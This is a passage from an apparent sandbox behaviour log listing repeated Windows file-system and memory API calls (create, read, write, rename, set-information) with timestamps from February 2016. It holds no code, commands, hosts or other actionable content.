{"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,456", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,466", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,466", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,466", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,476", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,476", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,486", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,496", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,496", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,496", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,516", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,516", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,516", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,516", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,526", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,526", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,536", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,536", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,536", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,546", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,556", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,556", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,556", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,566", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,566", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,576", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,576", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,576", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,586", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,586", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,596", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,596", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,596", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,606", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,606", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,616", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,616", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,626", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,626", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,636", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,646", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,646", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,656", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,656", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,666", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,676", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,676", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,676", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,696", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,706", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,706", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,717", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,727", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,737", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,737", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,747", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,757", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,767", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,767", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtCreateFile"}, {"category": "filesystem", 